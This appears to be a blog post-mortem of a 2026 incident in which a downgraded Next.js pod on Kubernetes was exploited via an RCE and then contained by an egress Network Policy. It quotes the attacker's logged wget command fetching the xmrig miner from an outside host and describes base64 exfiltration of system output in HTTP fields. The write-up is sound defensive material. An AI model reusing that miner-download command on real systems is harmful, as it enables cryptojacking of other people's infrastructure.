Blog Field Notes Next.js RCE in Production: How the Attack Unfolded and What Stopped It
Incident #security#kubernetes#nextjs#cve#networkpolicy#incident

Next.js RCE in Production: How the Attack Unfolded and What Stopped It

A manually deployed image with a downgraded Next.js version was exploited via GHSA-9qr9-h5gf-34mp within hours of deployment; a pre-existing Network Policy denying internet egress prevented the attacker from downloading xmrig and completing the compromise.

· Gideon Warui
ON THIS PAGE

Incident 1007418. On March 16, 2026, the frontend pod began executing system commands. The trigger was a downgraded Next.js package. The CVE had been published. The exploit was already automated.


Environment

ComponentDetail
ClusterAKS (<cluster>), West Europe
Affected pod<core-system>-frontend, namespaces <namespace>-dev and <namespace>-prod
Vulnerable image<acr-registry>.azurecr.io/<core-system>-frontend:20260313-081305
Next.js version15.2.4 (vulnerable) — downgraded from 15.2.6
CVEGHSA-9qr9-h5gf-34mp

How the vulnerability got in

The March 13 manual build pulled the latest <core-system>-frontend-dev branch. That branch had a dependency downgrade:

- "next": "15.2.6"
+ "next": "15.2.4"

The downgrade happened in a PR that passed code review. The reason was a rendering regression in 15.2.6 that hadn’t been triaged yet. 15.2.4 was the last known-good version. The build went out without a Trivy scan — the pipeline was bypassed for the manual deployment, and no scan was run manually.

GHSA-9qr9-h5gf-34mp is a Remote Code Execution vulnerability in the React server actions flight protocol. Next.js 15.2.4 is in the affected range. The patch was in 15.2.5 and above.


What the attacker did

The first alert came from process monitoring. The frontend pod was running:

/usr/bin/wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz

Standard xmrig delivery. The wget command is what automated scanners fire when they find an RCE — download a miner, make it executable, run it. The image was node:18-debian at the time, which includes wget as part of the Debian base.

Alongside the wget attempt, forensic examination of the pod showed zombie processes:

[sh] <defunct>
[base64] <defunct>

The base64 zombie indicated the attacker was already exfiltrating system information — encoding the output of system commands and sending it out as a digest field in HTTP requests. Decoding one such payload:

top - 04:14:07 up 16:35, 0 user, load average: 0.03, 0.10, 0.21
Tasks: 17 total, 1 running, 5 sleeping, 0 stopped, 11 zombie

System metrics only. No application data, no database credentials, no secrets. The pod’s filesystem access was read-only and its environment variables included secrets mounted via ExternalSecret — but the attacker never read them. The exfiltration was scoping the system before attempting the full compromise.


Why the download failed

The frontend Network Policy allows two outbound paths:

egress:
  # DNS via CoreDNS
  - to:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: kube-system
    ports:
      - protocol: UDP
        port: 53
  # Backend communication only
  - to:
      - podSelector:
          matchLabels:
            app: <core-system>-backend
    ports:
      - protocol: TCP
        port: 3000

No outbound HTTP or HTTPS. The wget to github.com had no egress path. The TCP connection attempt timed out. The xmrig binary was never downloaded.

This was not a lucky break. The Network Policy was intentional — it had been applied during the Kinsing incident in December specifically because internet egress from the frontend pod has no legitimate business purpose. The frontend calls the backend; the backend calls external APIs. The frontend itself should never initiate outbound internet connections.


Immediate response

# Scale to zero to stop any further execution
kubectl scale deployment <core-system>-frontend -n <namespace>-dev --replicas=0
kubectl scale deployment <core-system>-frontend -n <namespace>-prod --replicas=0

# Delete compromised pods (force-terminate)
kubectl delete pod -l app=<core-system>-frontend -n <namespace>-dev --force
kubectl delete pod -l app=<core-system>-frontend -n <namespace>-prod --force

The nodes were left running. The compromise was contained to the pod — readOnlyRootFilesystem: true had prevented any writes to the node’s filesystem, and the attack didn’t escape the container boundary.


Remediation

Step 1: Patch Next.js

sed -i 's/"next": "15.2.4"/"next": "15.2.6"/' package.json
npm install

Step 2: Rebuild with the hardened image

The Dockerfile.secure had already been created after the December incident. It uses node:20-alpine which has no wget, no curl, and no Debian toolchain:

FROM node:20-alpine AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
ARG NEXT_PUBLIC_API_URL=/api
ENV NEXT_PUBLIC_API_URL=${NEXT_PUBLIC_API_URL}
RUN npm run build

FROM node:20-alpine AS runner
WORKDIR /app
RUN addgroup -g 1001 nodejs && adduser -S -u 1001 nextjs
COPY --from=builder --chown=nextjs:nodejs /app/.next/standalone ./
COPY --from=builder --chown=nextjs:nodejs /app/public ./public
USER nextjs
EXPOSE 3000
CMD ["node", "server.js"]
docker build \
  --build-arg NEXT_PUBLIC_API_URL=/api \
  --no-cache \
  -f Dockerfile.secure \
  -t <acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 \
  .

docker push <acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706

Step 3: Redeploy

kubectl set image deployment/<core-system>-frontend \
  <core-system>-frontend=<acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 \
  -n <namespace>-dev

kubectl set image deployment/<core-system>-frontend \
  <core-system>-frontend=<acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 \
  -n <namespace>-prod

kubectl rollout status deployment/<core-system>-frontend -n <namespace>-prod
# deployment "<core-system>-frontend" successfully rolled out

Post-deployment: 0 restarts across 48 hours. No further alerts.


What the scan found on the vulnerable image

Running Trivy against the image that was in production during the attack:

PackageCVESeverity
next@15.2.4GHSA-9qr9-h5gf-34mpCRITICAL — RCE
form-dataCVE-2025-7783CRITICAL — unsafe random
axiosCVE-2025-58754HIGH — DoS
cross-spawnCVE-2024-21538HIGH — ReDoS
globCVE-2025-64756HIGH — command injection

Two CRITICAL vulnerabilities in the image that shipped. Neither was caught because no scan was run.


What changed after this

Every manual deployment now requires:

  1. A named approver (was: none required)
  2. npm audit --audit-level=critical before building
  3. Trivy scan of the built image before push
  4. Both checks logged in the deployment record

The pipeline already ran Trivy. The gap was the manual path — which is exactly what gets used when things are urgent and steps get skipped.

The latest tag was also retired. Every image now carries an environment suffix (-uat, -prod) so it’s unambiguous what is running where:

<acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706      # clean build
<acr-registry>.azurecr.io/<core-system>-backend:20260317-143958-prod  # env-tagged

The chain that led here

  1. Dependency downgrade in a PR — motivated by a real regression, not negligence
  2. Manual deployment that bypassed the pipeline — justified by urgency
  3. No scan on the manual path — process gap, not tool gap
  4. CVE already exploited in the wild — attackers scan for newly-deployed vulnerable versions

Any one of these is manageable. All four together, in sequence, is an incident.

#security#kubernetes#nextjs#cve#networkpolicy#incident